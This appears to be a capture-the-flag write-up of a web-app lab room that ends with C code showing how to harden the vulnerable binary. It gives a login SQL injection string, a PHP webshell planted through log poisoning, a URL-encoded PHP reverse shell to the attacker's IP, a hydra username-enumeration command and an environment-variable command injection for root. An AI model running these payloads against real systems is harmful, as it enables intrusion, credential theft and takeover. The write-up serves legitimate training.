Target IP: 10.10.186.166
Challenge Description:
There are two TCP ports open on the target machine: SSH and HTTP, as shown above.
Performing an aggressive port scan against the open TCP ports returns the result above. I will begin enumeration with the HTTP application on port 80.
Port 80: HTTP
The login webpage above is displayed for this web application. The source-code of this webpage does not contain anything useful. I tried spraying default credentials but I had no luck. I also tested the inputs for SQL injection, but it did not work either. I notice the application does allow registration.
I created a new account with the credentials test:tester and logged in successfully. The webpage above is presented to me after logging in. There is another user called WWBuddy and I was able to send a message to this user. I notice I cannot change my profile picture, so I cannot upload a webshell.
From source code enumeration, I found another page called chat.php. The source code of this page contains the interesting user IDs shown above. The other user, WWBuddy, has the user ID fc18e5f4aa09bbbb7fdedf5e277dda00, as shown above.
Alongside manual enumeration, I ran a directory search using the command gobuster dir -u http://10.10.186.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt. It found a directory called /api. I also found the JavaScript file chat.js, as shown in the image above.
The JavaScript source code contains the interesting API route /api/messages/ with the parameter uid as shown above. Maybe I can use this to read the messages of the user WWBuddy?
Using Burp Suite, I managed to read the messages of the new user I created through the API. However, I am unable to read the messages of the user WWBuddy using this attack vector.
I tried to find other users of the application and found two more, henry and roberto, using the command hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p 123 10.10.186.166 http-post-form "/login/index.php:username=^USER^&password=123:No account found with that username." (the error message "No account found with that username." tells valid usernames apart from invalid ones). I tried to brute-force the passwords of the three users, but had no luck.
Using the Edit Info button, I changed the username to WWBuddy' OR '1'='1'-- // to see if the application is vulnerable to SQL injection. I also tried changing the password to tester. After this, I successfully logged in as the user WWBuddy. This user does not have any useful messages; however, I can still read the messages of the users henry and roberto.
The messages between the users roberto and henry are interesting. Apparently the SSH password is the employee's birthday.
Logging in as the user roberto shows the user information above. This user's birthday is 04/14/1995. Before attacking the SSH service, I want to enumerate a bit further.
Using feroxbuster, I obtained the entries above. Among the directories it found, /admin stands out.
Browsing to /admin was not permitted for my account. However, when I logged into the web application as the user henry, I had access to this page! It contains the information above, and its source code contains the first flag. The page is a log file. Maybe I can poison it? I notice only valid users are logged. Maybe I can change the username of my new user to a PHP webshell?
I changed the username of the new user to the PHP payload <?php system($_GET['cmd']); ?>, as shown above. Then I browsed to the /admin page to poison the log.
The log is now poisoned, as shown above. I ran the commands whoami;id;ls and received the output above. Time to obtain a reverse shell connection. Since the target machine is already running PHP, I can use a PHP reverse shell.
I started a listener on my machine on port 8443. Then, through the poisoned PHP log file, I deployed the URL-encoded PHP payload: php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. I then received a reverse shell connection on my machine on port 8443, as shown above. I now have a foothold on the target machine as the user www-data.
I did some manual enumeration and found a few things, such as the authenticate binary, but I was unable to exploit it from this low-privileged shell. Then I transferred LinPEAS to the target machine. It found the SSH password yVnocsXsf%X68wf of the user roberto, as shown above.
I then connected to the target machine via SSH as the user roberto with this password.
This user has an interesting file called importante.txt, as shown above. This file also contains the user.txt flag. I will need to translate the text first.
I translated the text using Google Translate and received the message above. What is this gift the user is talking about? And in one week? I ran the binary /bin/authenticate and received the message "roberto developer. You are already a developer.". Now I am confused. The only option left is escalating privileges to the user jenny. From the previous enumeration, is it likely that the user jenny still uses the old SSH password format, her date of birth? Her DOB is likely in 1994. After some trial and error, I calculated her potential DOBs.
I stored the potential DOBs in a file called dates. Then, bingo! It looks like she is still on the old password format, as her password is her DOB, 08/03/1994.
Now I can log in via SSH as this new user, as shown above. The binary authenticate is responsible for checking a few things. After setting the environment variable USER to ; cat /root/root.txt, I obtained the flag THM{ch4ng3_th3_3nv1r0nm3nt}.
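The USER trick works because the privileged binary trusts an environment string that the caller fully controls. The C below is an added example, not the room's authenticate binary (whose source is not shown here): it contrasts the assumed unsafe pattern with three hardening steps a developer could apply, namely reading the identity from getuid()/getpwuid(), allow-listing any externally supplied name, and avoiding the shell entirely. The grep-based command line, the 32-character limit and all function names are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed pattern (not the real binary's code): a setuid program reads $USER,
 * which the caller controls, and splices it into a shell command line. With
 * USER="; cat /root/root.txt" the shell ends the intended command and runs the
 * appended one with the binary's privileges. Only the string is built here. */
void build_cmd_unsafe(const char *user, char *out, size_t n) {
    snprintf(out, n, "grep '^%s:' /etc/passwd", user);  /* would feed system() */
}

/* Fix 1: take the identity from the kernel, which the caller cannot alter,
 * instead of the environment. Returns 0 on success, -1 if the uid has no
 * passwd entry or the name does not fit; buf is then an empty string. */
int trusted_username(char *buf, size_t n) {
    struct passwd *pw = getpwuid(getuid());
    buf[0] = '\0';
    if (pw == NULL || pw->pw_name == NULL || strlen(pw->pw_name) >= n) return -1;
    strcpy(buf, pw->pw_name);
    return 0;
}

/* Fix 2: if a name must be accepted from outside, allow-list it: a letter or
 * '_' followed by letters, digits, '_', '-' or '.', 32 characters at most.
 * Every shell metacharacter in the payload above fails this check. */
int username_is_safe(const char *s) {
    size_t len = strlen(s);
    if (len == 0 || len > 32 || !(isalpha((unsigned char)s[0]) || s[0] == '_'))
        return 0;
    for (size_t i = 1; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.')) return 0;
    }
    return 1;
}

/* Fix 3: no shell at all; the account lookup is a library call, so there is
 * nothing for metacharacters to reach. 1 = exists, 0 = not, -1 = rejected. */
int account_exists(const char *user) {
    if (!username_is_safe(user)) return -1;
    return getpwnam(user) != NULL ? 1 : 0;
}
```

For a setuid program the environment should also be cleared or rebuilt at startup, so that no later code path can pick up a caller-supplied USER, PATH or LD_* variable by accident.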
The first flag.
The second flag is located inside importante.txt and shown above. The third (root) flag is THM{ch4ng3_th3_3nv1r0nm3nt}; I forgot to take a screenshot of it.